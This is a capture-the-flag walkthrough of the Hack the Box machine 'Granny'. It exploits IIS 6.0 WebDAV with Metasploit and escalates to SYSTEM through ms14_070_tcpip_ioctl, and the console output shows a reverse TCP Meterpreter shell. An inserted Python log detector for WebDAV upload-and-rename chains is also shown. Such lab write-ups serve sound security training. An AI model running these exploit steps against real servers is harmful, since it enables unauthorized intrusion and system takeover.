Hack the Box – Granny Walkthrough

Today we’re going to solve another CTF machine, “Granny”. It is now a retired box and can be accessed if you’re a VIP member.

Introduction

Specifications

  • Target OS: Windows
  • Services: HTTP
  • IP Address: 10.10.10.15
  • Difficulty: Easy

Weakness

  • Microsoft IIS version 6.0
  • ms15_051_client_copy_image

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step is the reconnaissance phase, starting with port scanning.

Ports Scanning

During this step we identify the target to see what is behind the IP address. After an intense scan of TCP and UDP ports we found nothing but a single open TCP port, 80, which is reported as IIS httpd 6.0.

After doing some research we found a remote code execution vulnerability:

https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_upload_asp

Exploitation

Since we have found our vulnerability let’s try to exploit it.

exploit/windows/iis/iis_webdav_upload_asp

After executing the exploit we instantly got the shell.
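The module linked above works by uploading a file over WebDAV PUT and then renaming it to a .asp with MOVE, so on the server side the IIS W3C logs show exactly that sequence. The detector below is an added example, not part of this walkthrough or of Metasploit; its log lines are constructed, and the list of script extensions is an assumption about what IIS 6.0 maps to script handlers.

```python
import os
from collections import defaultdict

# Extensions IIS 6.0 maps to script handlers (assumed list); a rename onto one of these is the tell.
EXEC_EXTS = {".asp", ".aspx", ".asa", ".cer", ".cdx", ".ashx", ".asmx"}
RENAME_METHODS = {"MOVE", "COPY"}

# Constructed W3C extended log excerpt (not a real capture from the box).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2018-11-28 22:30:01 10.10.10.15 GET /default.htm - 80 - 10.10.14.4 Mozilla/5.0 200
2018-11-28 22:30:07 10.10.10.15 PUT /abcd.txt - 80 - 10.10.14.4 Mozilla/5.0 201
2018-11-28 22:30:08 10.10.10.15 MOVE /abcd.txt - 80 - 10.10.14.4 Mozilla/5.0 207
2018-11-28 22:30:09 10.10.10.15 GET /abcd.asp - 80 - 10.10.14.4 Mozilla/5.0 200
2018-11-28 22:31:00 10.10.10.15 PUT /docs/readme.txt - 80 - 10.10.10.50 Office 201
2018-11-28 22:31:05 10.10.10.15 GET /docs/readme.txt - 80 - 10.10.10.50 Office 200
"""

def parse_w3c(text):
    """Yield one dict per record, naming columns from the #Fields: directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def find_webdav_upload_chains(text):
    """Return (client, reason, uri) alerts for PUT -> MOVE/COPY -> script-fetch chains."""
    uploaded = defaultdict(set)  # client ip -> basenames (without extension) it PUT
    renamed = defaultdict(set)   # client ip -> uploaded basenames it then MOVE/COPYed
    alerts = []
    for r in parse_w3c(text):
        ip, method, stem = r["c-ip"], r["cs-method"], r["cs-uri-stem"]
        base, ext = os.path.splitext(os.path.basename(stem))
        ext = ext.lower()
        if method == "PUT":
            uploaded[ip].add(base)
            if ext in EXEC_EXTS:  # direct upload of a script: no rename needed
                alerts.append((ip, "PUT of script extension", stem))
        elif method in RENAME_METHODS and base in uploaded[ip]:
            renamed[ip].add(base)
            alerts.append((ip, f"{method} of freshly uploaded file", stem))
        elif method == "GET" and ext in EXEC_EXTS and base in renamed[ip]:
            alerts.append((ip, "script fetched after upload and rename", stem))
    return alerts
```

The ordinary WebDAV client at 10.10.10.50 that only PUTs and reads a .txt produces no alert, while the upload-rename-fetch chain from 10.10.14.4 is flagged twice; disabling WebDAV, or denying PUT/MOVE/COPY where it is not needed, removes the whole class.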

Privilege Escalation

Now that we have user access, we’re going after NT AUTHORITY\SYSTEM. The initial shell can’t even run getuid, so we have to background it and use the post/windows/manage/migrate module.

This module spawns a notepad.exe process and migrates our shell into it. All we need to supply is the ID of the session we backgrounded earlier.

msf exploit(iis_webdav_upload_asp) > use post/windows/manage/migrate 
msf post(migrate) > show options

Module options (post/windows/manage/migrate):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   KILL     false            no        Kill original process for the session.
   NAME                      no        Name of process to migrate to.
   PID                       no        PID of process to migrate to.
   SESSION                   yes       The session to run this module on.
   SPAWN    true             no        Spawn process to migrate to. If name for process not given notepad.exe is used.

msf post(migrate) > set SESSION 1
SESSION => 1
msf post(migrate) > run

[*] Running module against GRANNY
[*] Current server process: svchost.exe (2624)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 228
[+] Successfully migrated to process 228
[*] Post module execution completed
msf post(migrate) > 

It worked anyway!

msf post(migrate) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : GRANNY
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > 

At this point it is a good idea to migrate to a stable process running under NT AUTHORITY\NETWORK SERVICE. In this case davcdata.exe seemed to be the only stable process available. The intended exploit here is ms15_051_client_copy_image, which immediately grants a root shell.

meterpreter > background
[*] Backgrounding session 1...
msf post(migrate) > use post/multi/recon/local_exploit_suggester 
msf post(local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on.
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf post(local_exploit_suggester) > set SESSION 1
SESSION => 1
msf post(local_exploit_suggester) > 

Running this module gives us a list of local exploits the machine appears to be vulnerable to.

msf post(local_exploit_suggester) > run

[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 38 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

Now we have to test each exploit to see which one actually works.

I found this one useful.

msf post(migrate) > use exploit/windows/local/ms14_070_tcpip_ioctl
msf exploit(ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.10.14.4:4444 
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (179267 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.4:4444 -> 10.10.10.15:1734) at 2018-11-28 23:38:41 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
